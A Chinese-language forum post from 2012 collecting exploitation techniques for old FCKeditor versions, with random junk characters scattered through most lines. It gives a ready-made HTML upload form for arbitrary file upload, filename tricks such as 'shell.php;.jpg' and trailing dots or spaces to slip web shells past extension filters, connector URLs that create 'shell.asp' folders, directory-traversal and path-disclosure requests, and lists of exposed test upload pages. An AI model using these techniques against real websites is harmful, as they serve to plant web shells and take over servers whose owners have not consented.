|
Fckeditor漏洞利用总结 查看编辑器版本2 z5 a( F3 v( c+ y: g# V& D9 p- ~
FCKeditor/_whatsnew.html% L0 i* X5 [" p$ Y) @' ^
————————————————————————————————————————————————————————————— 2. Version 2.2 版本, X! m' c5 M9 B9 A# f, f
Apache+linux 环境下在上传文件后面加个.突破!测试通过。0 ~, G: U, G- ^* }9 h4 V# q; B7 R
————————————————————————————————————————————————————————————— 3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。9 A- i/ W& V+ ]8 C# P- C4 m
<form id="frmUpload" enctype="multipart/form-data"! S( v& h% r9 |! `
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>( k" C6 R) B. ^. t% P3 e. m5 j
<input type="file" name="NewFile" size="50"><br>
, L: C: F4 u3 \) m<input id="btnUpload" type="submit" value="Upload">, }) R! @( J2 `: w1 C
</form>
- d9 i* u6 X: `- S, `) x————————————————————————————————————————————————————————————— 4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
9 `% C/ ?7 R* O; |0 V 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
. E/ R" s* i% N& V, {! m& J" x 4.1:提交shell.php+空格绕过
+ H' R. i/ I: V \7 m% }9 a2 p不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。/ K: Z/ s& J0 k# g; `
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。% C+ z. {, v+ C) r& w; c0 l
————————————————————————————————————————————————————————————— 5. 突破建立文件夹
6 U& x) ^ _" h$ @( n) e( dFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684, [; w p. Q; c1 _1 i$ G( \- v
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp# ~! I3 l4 \. v
————————————————————————————————————————————————————————————— 6. FCKeditor 中test 文件的上传地址, S6 C0 g! l: a; ~' O
FCKeditor/editor/filemanager/browser/default/connectors/test.html
1 t8 O7 J: `0 K! l/ a( tFCKeditor/editor/filemanager/upload/test.html
2 G4 d) _, F2 b5 @ S% V2 d" QFCKeditor/editor/filemanager/connectors/test.html
- L$ \- \ p8 vFCKeditor/editor/filemanager/connectors/uploadtest.html/ Y3 V T F5 G0 N d1 I
—————————————————————————————————————————————————————————————
# ?5 E- d3 B& k9 _: G e- K 7.常用上传地址
4 |' h4 K3 Z- Y7 j0 w% `FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/3 S H! D: I$ H2 q+ b+ p; h
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp/ U; W ]6 y3 X. }3 S
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)6 ~) R8 ?/ P7 J: ?
JSP 版:$ n& f0 W: r: e5 |7 b
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
. T' @$ Q; j" m b5 E8 V+ V注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
, a: ^$ A2 f+ `件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。5 p7 {, T8 ?8 k2 ?6 B6 P
————————————————————————————————————————————————————————————— 8.其他上传地址) U1 {6 ^( P, K
FCKeditor/_samples/default.html8 r* O6 T7 l4 j" x
FCKeditor/_samples/asp/sample01.asp# y, U& Y7 D" m0 K
FCKeditor/_samples/asp/sample02.asp2 i, v2 y$ |3 g5 ^& p( F- A& b
FCKeditor/_samples/asp/sample03.asp
; M- F- Q0 p1 k4 X% KFCKeditor/_samples/asp/sample04.asp, v2 Q7 Y. |4 f9 j$ x' t3 T
一般很多站点都已删除_samples 目录,可以试试。
) m5 p! p3 u# h* Q4 O+ ^. q# @FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
6 q# t1 I& s6 c/ V& `( w3 i: R————————————————————————————————————————————————————————————— 9.列目录漏洞也可助找上传地址
- Z1 |6 P5 |- W5 E& kVersion 2.4.1 测试通过
8 A" Y" s( Y" _: Q" @& e修改CurrentFolder 参数使用 ../../来进入不同的目录3 x! S8 B1 k1 T4 g& N' Z
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp4 X, B" b9 X3 m1 E0 X ]: I% }; c3 o, O
根据返回的XML 信息可以查看网站所有的目录。
1 I Y3 c" b+ F6 [1 M( i8 H8 j6 ]. cFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
1 L' S. R3 C/ ], b也可以直接浏览盘符:
$ A! ]( F# c% Z; K+ HJSP 版本:
, |( _9 J* h, V+ u) g/ U. i4 {5 K5 |# rFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
0 y" l, Z8 |5 {" }8 {! s————————————————————————————————————————————————————————————— 10.爆路径漏洞
; S$ |% h, L: c( a; N* O3 c9 r. KFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp2 }3 X1 }& k4 {! _
————————————————————————————————————————————————————————————— 11. FCKeditor 被动限制策略所导致的过滤不严问题
4 `6 d; `6 A) T+ B7 c0 j 影响版本: FCKeditor x.x <= FCKeditor v2.4.3
2 j& R$ `2 |& w* [% Y脆弱描述:, T: T, m. h$ {8 e1 R
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
' s e, o' q9 Bhtml|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm- y1 w2 c3 [0 R" I9 V
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
1 B4 [$ R% s( X+ _! ]" n+ K& a 而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
1 B4 }8 a% N7 w; Q) ^; @. F 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg! | 
发表于 2012-9-5 20:23:31
收藏
支持
反对